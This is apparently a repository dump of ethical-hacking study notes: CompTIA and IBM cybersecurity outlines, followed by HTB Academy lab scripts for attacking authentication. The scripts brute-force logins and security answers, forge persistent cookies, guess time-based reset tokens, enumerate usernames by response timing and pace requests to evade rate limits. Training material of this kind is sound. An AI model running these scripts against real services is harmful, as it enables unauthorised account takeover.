Virtual application streaming 20 | 4. Application streaming 21 | 5. Cloud-hosted virtual desktops 22 | 23 | ## Client-side Virtualization 24 | 25 | * Hypervisor (VM Manager) - manages virtual platform and guest OS. 26 | 27 | * Virtualization - native OS performing native OS processes 28 | 29 | * Emulation - one device running processes designed for a completely different architecture. 30 | -------------------------------------------------------------------------------- /CompTIA_220-1002/OperationalProcedures/README.md: -------------------------------------------------------------------------------- 1 | # Operational Procedures 2 | 3 | ## Documentation 4 | 5 | * Best practices: 6 | 7 | 1. Network topology diagrams 8 | 2. Knowledge base 9 | 3. Incident response documentation 10 | 4. Compliance 11 | 5. Regulatory 12 | 6. Inventory Management 13 | 14 | ## Disaster Recovery 15 | 16 | * Disaster recovery practices: 17 | 18 | 1. Backup strategies - image level; file level. 19 | 2. Critical application backups 20 | 3. Backup testing and audits 21 | 4. Uninterruptible Power Supply (UPS) 22 | 5. Cloud storage 23 | 6. Account recovery options 24 | 25 | ## Privacy, Licensing and Policies 26 | 27 | * Incident response factors: 28 | 29 | 1. First response 30 | 2. Documentation 31 | 3. Chain of custody 32 | 33 | * Licensing: 34 | 35 | 1. Closed source (Commerical) 36 | 2. Free and Open Source (FOSS) 37 | 3. End User Licensing Agreement (EULA) 38 | 4. Digital Rights Management (DRM) 39 | -------------------------------------------------------------------------------- /CompTIA_220-1002/README.md: -------------------------------------------------------------------------------- 1 | # CompTIA A+ 220-1002 2 | 3 | Notes for the Professor Messer course [CompTIA A+ 220-1002 Training](https://www.professormesser.com/free-a-plus-training/220-1001/220-1000-training-course/). 4 | 5 | Topics: 6 | 7 | * [Operating Systems](OperatingSystems/README.md) 8 | 9 | * [Security](Security/README.md) 10 | 11 | * [Software Troubleshooting](SoftwareTroubleshooting/README.md) 12 | 13 | * [Operational Procedures](OperationalProcedures/README.md) 14 | -------------------------------------------------------------------------------- /CompTIA_220-1002/Security/README.md: -------------------------------------------------------------------------------- 1 | # Security 2 | 3 | ## Logical Security 4 | 5 | * Logical security concepts: 6 | 7 | 1. Microsoft Active Directory - centralized management; uses Organizational Units. 8 | 2. Mobile Device Management (MDM) - set policies on apps, data, etc. 9 | 3. Port security 10 | 4. Certificate-based authentication 11 | 5. Anti-virus and anti-malware 12 | 6. Firewalls - host-based and network-based. 13 | 7. Directory permissions 14 | 8. VPN concentrator - Encrypt data traversing a public network. 15 | 9. Data Loss Prevention (DLP) 16 | 10. Access Control Lists (ACLs) 17 | 11. Least privilege - permissions set to bare minimum. 18 | 19 | ## Malware 20 | 21 | * Common types of malware: 22 | 23 | 1. Ransomware 24 | 2. Crypto-malware 25 | 3. Trojan horse 26 | 4. Spyware 27 | 5. Keyloggers 28 | 6. Rootkits 29 | 7. Virus 30 | 8. Worms 31 | 9. Botnets 32 | 33 | * Anti-malware tools: 34 | 35 | 1. Anti-virus and anti-malware 36 | 2. Windows Recovery Environment 37 | 3. End user education 38 | 4. Firewalls 39 | 5. Secure DNS 40 | 41 | ## Security Threats 42 | 43 | * Social engineering principles: 44 | 45 | 1. Authority 46 | 2. Intimidation 47 | 3. Social proof 48 | 4. Scarcity 49 | 5. Urgency 50 | 6. Familiarity 51 | 7. Trust 52 | 53 | * Social engineering types: 54 | 55 | 1. Phishing 56 | 2. Spear phishing (whaling) 57 | 3. Impersonation 58 | 4. Shoulder surfing 59 | 5. Tailgating 60 | 6. Dumpster diving 61 | 62 | * Denial of service - force a service to fail by overloading; using design failure or vulnerability. 63 | 64 | * DDoS (Distributed Denial of Service) - launch army of computers to bring down a service; uses botnets. 65 | 66 | * Mitigating DDos attacks - filter out traffic patterns; anti-DDoS systems. 67 | 68 | * Zero-day attacks - vulnerability not detected yet. 69 | 70 | * Man-in-the-middle attacks - using traffic redirection, ARP poisoning. 71 | 72 | * Mitigating MITM attacks - use encrypted protocols like HTTPS, SSH. 73 | 74 | * Brute Force attacks - keep trying the login process; slow; dictionary attacks; rainbow tables (doesn't work for salted hashes). 75 | 76 | * Spoofing - pretend to be something you aren't; MAC spoofing, IP address spoofing. 77 | -------------------------------------------------------------------------------- /CompTIA_220-1002/SoftwareTroubleshooting/README.md: -------------------------------------------------------------------------------- 1 | # Software Troubleshooting 2 | 3 | ## Troubleshooting Windows 4 | 5 | * Slow system performance - check Task Manager; Windows Update; check disk space; laptop may be using power-saving mode; anti-virus scan. 6 | 7 | * Limited connectivity - check IP address config; reboot; ping default gateway. 8 | 9 | * Boot errors - check boot drives; Startup Repair; modify Windows BCD. 10 | 11 | * App crashes - check Event Log; Reliability Monitor; reinstall app. 12 | 13 | * BSOD - reboot system; System Restore; reset hardware; hardware diagnostics. 14 | 15 | * Black screen - start in VGA mode; run SFC (System File Checker); update drivers in Safe Mode; recover from backup. 16 | 17 | * Slow boot - manage startup apps; Task Manager. 18 | 19 | ## Troubleshooting Solutions 20 | 21 | * Common troubleshooting solutions: 22 | 23 | 1. Defragmentation 24 | 2. Reboot 25 | 3. Kill tasks 26 | 4. Restart services 27 | 5. Update network settings 28 | 6. Reload/Restore OS 29 | 7. Update and patch 30 | 8. Repair apps 31 | 9. Disable startup services/apps 32 | 10. Safe Mode 33 | 34 | ## Troubleshooting Security Issues 35 | 36 | * Pop-ups - update browser; scan for malware. 37 | 38 | * Browser redirection - scan for malware; anti-malware; restore backup. 39 | 40 | * Browser security alerts - look at certificate details. 41 | 42 | * Malware network symptoms - slow performance; OS update failures; connectivity issues. 43 | 44 | * Malware OS symptoms - renamed system files; files removed; access denied. 45 | 46 | * System lock up - terminate bad apps; check logs; security issues. 47 | 48 | * Email security - spam filters; scan for malware. 49 | 50 | ## Malware Removal 51 | 52 | * Steps to remove malware: 53 | 54 | 1. Identify malware symptoms 55 | 2. Quarantine infected systems 56 | 3. Disable System Restore 57 | 4. Update anti-virus 58 | 5. Scan and remove 59 | 6. Schedule scans and run updates 60 | 7. Enable system protection 61 | 8. Educate end user 62 | -------------------------------------------------------------------------------- /CompTIA_N10-007/README.md: -------------------------------------------------------------------------------- 1 | # CompTIA N10-007 Network+ 2 | 3 | Notes for the Professor Messer course [CompTIA N10-007 Network+](https://www.professormesser.com/network-plus/n10-007/n10-007-training-course/). 4 | 5 | Topics: 6 | 7 | * [Networking Concepts](NetworkingConcepts/README.md) 8 | 9 | * [Infrastructure](Infrastructure/README.md) 10 | 11 | * [Network Operations](NetworkOperations/README.md) 12 | 13 | * [Network Security](NetworkSecurity/README.md) 14 | 15 | * [Network Troubleshooting and Tools](NetworkTroubleshooting/README.md) 16 | -------------------------------------------------------------------------------- /CybersecurityAnalyst/Capstone/README.md: -------------------------------------------------------------------------------- 1 | # Cybersecurity Capstone: Breach Response Case Studies 2 | 3 | 1. [Incident Management Response and Cyberattack Frameworks](#incident-management-response-and-cyberattack-frameworks) 4 | 2. [Phishing Scams](#phishing-scams) 5 | 3. [Point of Sale Breach](#point-of-sale-breach) 6 | 4. [3rd Party Breach](#3rd-party-breach) 7 | 5. [Ransomware](#ransomware) 8 | 9 | ## Incident Management Response and Cyberattack Frameworks 10 | 11 | * NIST recommendations for IR (Incident Response): 12 | 13 | * Establish formal IR capability 14 | * Create IR policy 15 | * Develop IR plan based on IR policy 16 | * Develop IR procedures 17 | * Establish policies & procedures regarding IR information 18 | * Consider relevant factors when selecting IR team model 19 | 20 | * NIST IR lifecycle: 21 | 22 | * Preparation 23 | * Detection & Analysis 24 | * Containment, Eradication & Recovery 25 | * Post-incident activity 26 | 27 | ## Phishing Scams 28 | 29 | * Types of phishing scams: 30 | 31 | * Phishing 32 | * Spear phishing 33 | * Whaling 34 | 35 | ## Point of Sale Breach 36 | 37 | * For PoS (Point of Sale) Security, the PCI DSS (Payment Card Industry Data Security Standard) is the main payment card industry info security standard; with the goal to protect cardholder data & sensitive authentication data. 38 | 39 | * Security controls & processes for PCI DSS requirements: 40 | 41 | * Build & maintain secure network & systems 42 | * Protect cardholder data 43 | * Maintain vulnerability management program 44 | * Implement strong access control measures 45 | * Regularly monitor and test networks 46 | * Maintain Information Security policy 47 | 48 | * PoS malware examples: 49 | 50 | * Alina 51 | * vSkimmer 52 | * Dexter 53 | * FYSNA 54 | * Decebel 55 | * BlackPOS 56 | 57 | ## 3rd Party Breach 58 | 59 | * Types of 3rd party breaches 60 | 61 | * Cloud-based 62 | * Payment 63 | * JavaScript library 64 | 65 | ## Ransomware 66 | 67 | * Ransomware - malware that infects computer systems, restricting user access; users are told that unless a ransom is paid, access will not be restored. 68 | 69 | * Types of ransomware: 70 | 71 | * Crypto 72 | * Locker 73 | * Leakware/Doxware 74 | 75 | * Ransomware attack vectors: 76 | 77 | * Phishing 78 | * RDP (Remote Desktop Protocol) 79 | * Software vulnerabilities 80 | * Malicious links 81 | 82 | * Prevention: 83 | 84 | * Backup 85 | * Update software & passwords 86 | * Antivirus 87 | * Beware of links 88 | 89 | * Ransomware examples: 90 | 91 | * Locky 92 | * WannaCry 93 | * Bad Rabbit 94 | * Ryuk 95 | * Troldesh 96 | * Jigsaw 97 | * CryptoLocker 98 | * Petya 99 | * GoldenEye 100 | * GandCrab 101 | -------------------------------------------------------------------------------- /CybersecurityAnalyst/Pentesting/README.md: -------------------------------------------------------------------------------- 1 | # Penetration Testing, Incident Response and Forensics 2 | 3 | 1. [Penetration Testing](#penetration-testing) 4 | 2. [Incident Response](#incident-response) 5 | 3. [Digital Forensics](#digital-forensics) 6 | 4. [Introduction to Scripting](#introduction-to-scripting) 7 | 8 | ## Penetration Testing 9 | 10 | * Approaches to pentesting: 11 | 12 | * Internal, external 13 | * Web, mobile app assessments 14 | * Social engineering 15 | * Wireless networks, embedded devices, IoT 16 | * ICS (Industry Control Systems) pentesting 17 | 18 | * Phases: 19 | 20 | * Planning 21 | * Discovery 22 | * Attack 23 | * Report 24 | 25 | ## Incident Response 26 | 27 | * Incident response - detection of incidents to minimize loss, mitigate exploits and restore services. 28 | 29 | * IR team models: 30 | 31 | * Central 32 | * Distributed 33 | * Coordinating 34 | 35 | * IR phases: 36 | 37 | * Preparation 38 | * Detection & Analysis 39 | * Containment, Eradication & Recovery 40 | * Post-incident activity 41 | 42 | ## Digital Forensics 43 | 44 | * Digital forensics - identification, collection, examination & analysis of data while preserving its integrity and maintaining a chain of custody. 45 | 46 | * Forensic process 47 | 48 | * Collection 49 | * Examination 50 | * Analysis 51 | * Reporting 52 | 53 | ## Introduction to Scripting 54 | 55 | * Scripts - small interpreted programs for purposes such as automation, testing, etc. 56 | 57 | * Common scripting languages include Javascript, Bash, Perl, PowerShell, Binary and Hex. 58 | -------------------------------------------------------------------------------- /CybersecurityAnalyst/README.md: -------------------------------------------------------------------------------- 1 | # IBM Cybersecurity Analyst Professional Certificate 2 | 3 | * Notes for the Coursera certificate [IBM Cybersecurity Analyst Professional Certificate](https://www.coursera.org/professional-certificates/ibm-cybersecurity-analyst), consisting of 8 courses: 4 | 5 | 1. [Introduction to Cybersecurity Tools & Cyber Attacks](IntroCyberToolsAttacks/README.md) 6 | 7 | 2. [Cybersecurity Roles, Processes & Operating System Security](CyberRolesProcesses/README.md) 8 | 9 | 3. [Cybersecurity Compliance Framework & System Administration](CyberCompliance/README.md) 10 | 11 | 4. [Network Security & Database Vulnerabilities](NetworkSecurity/README.md) 12 | 13 | 5. [Penetration Testing, Incident Response and Forensics](Pentesting/README.md) 14 | 15 | 6. [Cyber Threat Intelligence](CyberThreatIntel/README.md) 16 | 17 | 7. [Cybersecurity Capstone: Breach Response Case Studies](Capstone/README.md) 18 | -------------------------------------------------------------------------------- /HTBAcademy/BrokenAuthentication/basic_bruteforce.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import os.path 4 | 5 | # define target url, change as needed 6 | url = "http://brokenauthentication.hackthebox.eu/login.php" 7 | 8 | # define a fake headers to present ourself as Chromium browser, change if needed 9 | headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36"} 10 | 11 | # define the string expected if valid account has been found. our basic PHP example replies with Welcome in case of success 12 | 13 | valid = "Welcome" 14 | 15 | """ 16 | wordlist is expected as CSV with field like: Vendor,User,Password,Comment 17 | for this test we are using SecLists' Passwords/Default-Credentials/default-passwords.csv 18 | change this function if your wordlist has a different format 19 | """ 20 | def unpack(fline): 21 | # get user 22 | userid = fline.split(",")[1] 23 | 24 | # if pass could contain a , we should need to handle this in another way 25 | passwd = fline.split(",")[2] 26 | 27 | return userid, passwd 28 | 29 | """ 30 | our PHP example accepts requests via POST, and requires parameters as userid and passwd 31 | """ 32 | def do_req(url, userid, passwd, headers): 33 | data = {"userid": userid, "passwd": passwd, "submit": "submit"} 34 | res = requests.post(url, headers=headers, data=data) 35 | 36 | return res.text 37 | 38 | """ 39 | if defined valid string is found in response body return True 40 | """ 41 | def check(haystack, needle): 42 | if needle in haystack: 43 | return True 44 | else: 45 | return False 46 | 47 | def main(): 48 | # check if this script has been runned with an argument, and the argument exists and is a file 49 | if (len(sys.argv) > 1) and (os.path.isfile(sys.argv[1])): 50 | fname = sys.argv[1] 51 | else: 52 | print("[!] Please check wordlist.") 53 | print("[-] Usage: python3 {} /path/to/wordlist".format(sys.argv[0])) 54 | sys.exit() 55 | 56 | # open the file, this is our wordlist 57 | with open(fname) as fh: 58 | # read file line by line 59 | for fline in fh: 60 | # skip line if it starts with a comment 61 | if fline.startswith("#"): 62 | continue 63 | # use unpack() function to extract userid and password from wordlist, removing trailing newline 64 | userid, passwd = unpack(fline.rstrip()) 65 | 66 | # call do_req() to do the HTTP request 67 | print("[-] Checking account {} {}".format(userid, passwd)) 68 | res = do_req(url, userid, passwd, headers) 69 | 70 | # call function check() to verify if HTTP response text matches our content 71 | if (check(res, valid)): 72 | print("[+] Valid account found: userid:{} passwd:{}".format(userid, passwd)) 73 | 74 | if __name__ == "__main__": 75 | main() 76 | -------------------------------------------------------------------------------- /HTBAcademy/BrokenAuthentication/cookie_tampering.py: -------------------------------------------------------------------------------- 1 | from base64 import b64encode 2 | from binascii import hexlify 3 | import codecs 4 | import requests 5 | from sys import exit 6 | 7 | # create url using user and password as argument 8 | url = "http://127.0.0.1/profile.php" 9 | 10 | # assume cookie is set as 11 | # PERSISTENT=6e554576714b41797077636a4d4b576d6e4b41304d4a35304c3239696e3279794277526d5a777433 12 | # and decoded gives htbuser:persistentcookie:13287 13 | 14 | # bruteforce the 5digit scope 15 | for x in range(100000): 16 | 17 | # force the string to be 5 chars, even if it is smaller than 10000 18 | x = str(x).zfill(5) 19 | 20 | print ("[+] Testing {}\r".format(x)) 21 | plaintext_cookie = "htbadmin:persistentcookie:{}".format(x) 22 | 23 | # step 1: to Base64 24 | x_step1 = b64encode(plaintext_cookie.encode()).decode() 25 | #print(x_step1) 26 | 27 | # step 2: rot13 28 | x_step2 = codecs.encode(x_step1, "rot-13").encode() 29 | #print(x_step2) 30 | 31 | # step 3: to hex 32 | encoded_cookie = hexlify(x_step2) 33 | #print(encoded_cookie) 34 | 35 | # set cookie, decoding because wants a string 36 | cookie = { "PERSISTENT": encoded_cookie.decode() } 37 | 38 | # do the request 39 | res = requests.get(url, cookies=cookie) 40 | 41 | # handle Welcome message, that should tell us we found a valid cookie 42 | if 'Welcome ' in res.text: 43 | print("[+] Valid cookie found: {}".format(encoded_cookie)) 44 | # we don't need more check 45 | exit() 46 | # if we are prompted a login page, we probably don't have a valid cookie 47 | elif 'Login ' in res.text: 48 | continue 49 | # we should never be here, notify in case 50 | else: 51 | print("[-] Unexpected reply, please manually check cookie {}".format(encoded_cookie)) 52 | -------------------------------------------------------------------------------- /HTBAcademy/BrokenAuthentication/final_skill_assessment_bruteforce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import time 3 | 4 | # file that contain user:pass 5 | userpass_file = "valid_passwords.txt" 6 | 7 | # create url using user and password as argument 8 | url = "http://83.136.254.223:57399/login.php" 9 | 10 | # rate limit blocks for 30 seconds 11 | lock_time = 30 12 | 13 | # define limit after which we get hit with too many attempts message 14 | attempts_limit = 5 15 | 16 | # message that alert us we hit rate limit 17 | lock_message = "Too many" 18 | 19 | # define number of attempts 20 | number_of_attempts = 0 21 | 22 | # read user and password 23 | with open(userpass_file, "r") as fh: 24 | for fline in fh: 25 | 26 | # if we have reached limit of attempts at a time, wait on own 27 | if (number_of_attempts != 0) and (number_of_attempts % 5 == 0): 28 | print("[-] Hit rate limit, sleeping 30") 29 | time.sleep(lock_time+0.5) 30 | 31 | # skip comment 32 | if fline.startswith("#"): 33 | continue 34 | 35 | # take username 36 | username = fline.split(":")[0] 37 | 38 | # take password, join to keep password that contain a : 39 | password = ":".join(fline.split(":")[1:]).replace('\n', '') 40 | 41 | # prepare POST data 42 | data = { 43 | "userid": username, 44 | "passwd": password, 45 | "submit": "submit" 46 | } 47 | 48 | # do the request 49 | res = requests.post(url, data=data) 50 | # print(res.text) 51 | 52 | number_of_attempts += 1 53 | 54 | # handle generic credential error 55 | if "Invalid credentials" in res.text: 56 | print("[-] Invalid credentials: userid:{} passwd:{}".format(username, password)) 57 | elif "Welcome back" in res.text: 58 | print("[+] Valid credentials: userid:{} passwd:{}".format(username, password)) 59 | # hit rate limit, let's say we have to wait 30 seconds 60 | elif lock_message in res.text: 61 | print("[-] Hit rate limit, sleeping 30") 62 | # do the actual sleep plus 0.5 to be sure 63 | time.sleep(lock_time+0.5) 64 | -------------------------------------------------------------------------------- /HTBAcademy/BrokenAuthentication/passwd_policy_req.txt: -------------------------------------------------------------------------------- 1 | qwerty 2 | Qwerty 3 | Qwerty1 4 | Qwertyu1 5 | Qwert1! 6 | Qwerty1! 7 | QWERTY1 8 | QWERT1! 9 | QWERTY1! 10 | Qwerty! 11 | Qwertyuiop12345!@#$% -------------------------------------------------------------------------------- /HTBAcademy/BrokenAuthentication/predictable_questions.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import os.path 4 | 5 | # target url, change as needed 6 | url = "http://brokenauthentication.hackthebox.eu/predictable_questions.php" 7 | 8 | # fake headers to present ourself as Chromium browser, change if needed 9 | headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36"} 10 | 11 | # string expected if the answer is wrong 12 | invalid = "Sorry, wrong answer" 13 | 14 | # question to bruteforce 15 | question = "Do you prefer pizza or pasta?" 16 | 17 | 18 | # wordlist is expected as one word per line, function kept to let you to parse different wordlist format keeping the code clean 19 | def unpack(fline): 20 | answer = fline 21 | 22 | return answer 23 | 24 | # do the web request, change data as needed 25 | def do_req(url, answer, headers): 26 | # closely inspect POST data sent using any intercepting proxy to create a valid data 27 | data = {"answer": answer, "question": question, "userid": "htbadmin", "submit": "answer"} 28 | res = requests.post(url, headers=headers, data=data) 29 | 30 | return res.text 31 | 32 | # pretending we just know the message received when the answer is wrong, we flip the check 33 | def check(haystack, needle): 34 | # if our invalid string is found in response body return False 35 | if needle in haystack: 36 | return False 37 | else: 38 | return True 39 | 40 | def main(): 41 | # check if wordlist has been given and exists 42 | if (len(sys.argv) > 1) and (os.path.isfile(sys.argv[1])): 43 | fname = sys.argv[1] 44 | else: 45 | print("[!] Please check wordlist.") 46 | print("[-] Usage: python3 {} /path/to/wordlist".format(sys.argv[0])) 47 | sys.exit() 48 | 49 | # open the file 50 | with open(fname) as fh: 51 | for fline in fh: 52 | # skip line if starts with a comment 53 | if fline.startswith("#"): 54 | continue 55 | # extract userid and password from wordlist, removing trailing newline 56 | answer = unpack(fline.rstrip()) 57 | 58 | # do HTTP request 59 | print("[-] Checking word {}".format(answer)) 60 | res = do_req(url, answer, headers) 61 | 62 | # check if response text matches our content 63 | #print(res) 64 | if (check(res, invalid)): 65 | print("[+] Valid answer found: {}".format(answer)) 66 | sys.exit() 67 | 68 | if __name__ == "__main__": 69 | main() 70 | -------------------------------------------------------------------------------- /HTBAcademy/BrokenAuthentication/rate_limit_check.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import time 3 | 4 | # file that contain user:pass 5 | userpass_file = "userpass.txt" 6 | 7 | # create url using user and password as argument 8 | url = "http://127.0.0.1/login.php" 9 | 10 | # rate limit blocks for 30 seconds 11 | lock_time = 30 12 | 13 | # message that alert us we hit rate limit 14 | lock_message = "Too many failures" 15 | 16 | # read user and password 17 | with open(userpass_file, "r") as fh: 18 | for fline in fh: 19 | # skip comment 20 | if fline.startswith("#"): 21 | continue 22 | 23 | # take username 24 | username = fline.split(":")[0] 25 | 26 | # take password, join to keep password that contain a : 27 | password = ":".join(fline.split(":")[1:]).replace('\n', '') 28 | 29 | # prepare POST data 30 | data = { 31 | "user": username, 32 | "pass": password 33 | } 34 | 35 | # do the request 36 | res = requests.post(url, data=data) 37 | 38 | # handle generic credential error 39 | if "Invalid credentials" in res.text: 40 | print("[-] Invalid credentials: userid:{} passwd:{}".format(username, password)) 41 | # user and password were valid ! 42 | elif "Access granted" in res.text: 43 | print("[+] Valid credentials: userid:{} passwd:{}".format(username, password)) 44 | # hit rate limit, let's say we have to wait 30 seconds 45 | elif lock_message in res.text: 46 | print("[-] Hit rate limit, sleeping 30") 47 | # do the actual sleep plus 0.5 to be sure 48 | time.sleep(lock_time+0.5) 49 | -------------------------------------------------------------------------------- /HTBAcademy/BrokenAuthentication/reset_token_time.py: -------------------------------------------------------------------------------- 1 | from hashlib import md5 2 | import requests 3 | from sys import exit 4 | from time import time 5 | 6 | url = "http://127.0.0.1/reset_token_time.php" 7 | 8 | # to have a wide window try to bruteforce starting from 120seconds ago 9 | now = int(time()) 10 | start_time = now - 120 11 | fail_text = "Wrong token" 12 | 13 | # loop from start_time to now. + 1 is needed because of how range() works 14 | for x in range(start_time, now + 1): 15 | # get token md5 16 | md5_token = md5(str(x).encode()).hexdigest() 17 | data = { 18 | "submit": "check", 19 | "token": md5_token 20 | } 21 | 22 | print("checking {} {}".format(str(x), md5_token)) 23 | 24 | # send the request 25 | res = requests.post(url, data=data) 26 | 27 | # response text check 28 | if not fail_text in res.text: 29 | print(res.text) 30 | print("[*] Congratulations! raw reply printed before") 31 | exit() 32 | 33 | -------------------------------------------------------------------------------- /HTBAcademy/BrokenAuthentication/timing.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import os.path 4 | 5 | # define target url, change as needed 6 | url = "http://brokenauthentication.hackthebox.eu/login.php" 7 | 8 | # define a fake headers to present ourself as Chromium browser, change if needed 9 | headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36"} 10 | 11 | # define the string expected if valid account has been found. our basic PHP example replies with Welcome in case of success 12 | 13 | valid = "Welcome" 14 | 15 | """ 16 | wordlist is expected as simple list, we keep this function to have it ready if needed. 17 | for this test we are using /opt/useful/SecLists/Usernames/top-usernames-shortlist.txt 18 | change this function if your wordlist has a different format 19 | """ 20 | def unpack(fline): 21 | userid = fline 22 | passwd = 'foobar' 23 | 24 | return userid, passwd 25 | 26 | """ 27 | our PHP example accepts requests via POST, and requires parameters as userid and passwd 28 | """ 29 | def do_req(url, userid, passwd, headers): 30 | data = {"userid": userid, "passwd": passwd, "submit": "submit"} 31 | res = requests.post(url, headers=headers, data=data) 32 | print("[+] user {:15} took {}".format(userid, res.elapsed.total_seconds())) 33 | 34 | return res.text 35 | 36 | def main(): 37 | # check if this script has been runned with an argument, and the argument exists and is a file 38 | if (len(sys.argv) > 1) and (os.path.isfile(sys.argv[1])): 39 | fname = sys.argv[1] 40 | else: 41 | print("[!] Please check wordlist.") 42 | print("[-] Usage: python3 {} /path/to/wordlist".format(sys.argv[0])) 43 | sys.exit() 44 | 45 | # open the file, this is our wordlist 46 | with open(fname) as fh: 47 | # read file line by line 48 | for fline in fh: 49 | # skip line if it starts with a comment 50 | if fline.startswith("#"): 51 | continue 52 | # use unpack() function to extract userid and password from wordlist, removing trailing newline 53 | userid, passwd = unpack(fline.rstrip()) 54 | 55 | # call do_req() to do the HTTP request 56 | print("[-] Checking account {} {}".format(userid, passwd)) 57 | res = do_req(url, userid, passwd, headers) 58 | 59 | if __name__ == "__main__": 60 | main() 61 | 62 | -------------------------------------------------------------------------------- /HTBAcademy/Footprinting/enum-method3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SrivathsanNayak/ethical-hacking-notes/a4545502478fb066ef872fed66823358ab7ad715/HTBAcademy/Footprinting/enum-method3.png -------------------------------------------------------------------------------- /HTBAcademy/JSDeobfuscation/README.md: -------------------------------------------------------------------------------- 1 | # Javascript Deobfuscation 2 | 3 | 1. [Obfuscation](#obfuscation) 4 | 1. [Deobfuscation](#deobfuscation) 5 | 6 | ## Obfuscation 7 | 8 | * We can view the source code of a webpage using Developer Tools (Ctrl+U to view page source); JS can be written internally between ```